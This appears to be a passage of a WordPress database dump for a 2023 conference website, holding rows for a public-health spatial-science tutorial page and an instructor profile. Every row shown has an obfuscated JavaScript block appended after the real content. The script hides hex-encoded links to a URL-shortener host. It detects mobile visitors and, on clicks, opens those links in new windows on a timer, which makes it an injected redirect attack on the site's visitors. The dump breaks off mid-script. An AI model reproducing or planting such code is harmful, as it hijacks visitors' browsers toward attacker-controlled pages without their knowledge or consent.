_0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Public Health Data Handling, Analysis and Visualisation using Spatial Science','','inherit','closed','closed','','3681-revision-v1','','','2023-02-02 07:47:02','2023-02-02 07:47:02','',3681,'https://gsw2023.com/?p=3687',0,'revision','',0),
(3688,1,'2023-02-02 08:05:07','2023-02-02 08:05:07','Geoinformatics Department, Indian Institute of Remote Sensing, Dehradun, INDIA\n\n<!-- /wp:paragraph --> <!-- wp:paragraph -->\n\n<strong>ISPRS Chair, WG IV/10</strong>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','DR.Sameer Saran','','publish','closed','closed','','sameer-saran','','','2023-02-07 00:49:30','2023-02-07 00:49:30','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=3688',0,'dt_team','',0),
(3689,1,'2023-02-02 08:09:53','2023-02-02 08:09:53','<p>[vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3685\" img_size=\"1200x1000\"][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h5>Tutorial Topic</h5>\n<h6>The past century has seen an unprecedented burden of infectious, chronic and vector-borne diseases that threaten the public and global health. There are also direct implications on wildlife populations. Understanding the spatial processes and temporal dynamics are important for guiding policy informed decisions. Policymakers, public health officials, and academic researchers are key stakeholders in the fight against diseases. For instance, the recent COVID-19 pandemic has generated tremendous amount of data which is of prime importance. The availability of spatial tools with analytical &amp; visualization capability provided meaningful insights in handling public health data for scientific understanding of disease trends and patterns. Hence, there is a clear need of simple one-stop solution that is backed by reliable data source.</h6>\n<h6>In this tutorial, we focus on techniques and spatial tools for (i) optimal data collection on disease occurrence and surveillance through citizen-centric approach, (ii) machine learning based statistical modelling tools for active surveillance, and (iii) analysing the spatial complexity of diseases through visualization support.</h6>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"blue\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\">Short Profile &amp; Affiliation of Instructors</h4>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"70\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Public Health Data Handling, Analysis and Visualisation using Spatial Science','','inherit','closed','closed','','3681-revision-v1','','','2023-02-02 08:09:53','2023-02-02 08:09:53','',3681,'https://gsw2023.com/?p=3689',0,'revision','',0),
(3690,1,'2023-02-02 08:10:49','2023-02-02 08:10:49','<p>[vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3685\" img_size=\"1200x1000\"][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h5>Tutorial Topic</h5>\n<h6>The past century has seen an unprecedented burden of infectious, chronic and vector-borne diseases that threaten the public and global health. There are also direct implications on wildlife populations. Understanding the spatial processes and temporal dynamics are important for guiding policy informed decisions. Policymakers, public health officials, and academic researchers are key stakeholders in the fight against diseases. For instance, the recent COVID-19 pandemic has generated tremendous amount of data which is of prime importance. The availability of spatial tools with analytical &amp; visualization capability provided meaningful insights in handling public health data for scientific understanding of disease trends and patterns. Hence, there is a clear need of simple one-stop solution that is backed by reliable data source.</h6>\n<h6>In this tutorial, we focus on techniques and spatial tools for (i) optimal data collection on disease occurrence and surveillance through citizen-centric approach, (ii) machine learning based statistical modelling tools for active surveillance, and (iii) analysing the spatial complexity of diseases through visualization support.</h6>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"blue\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\">Short Profile &amp; Affiliation of Instructors</h4>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"70\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\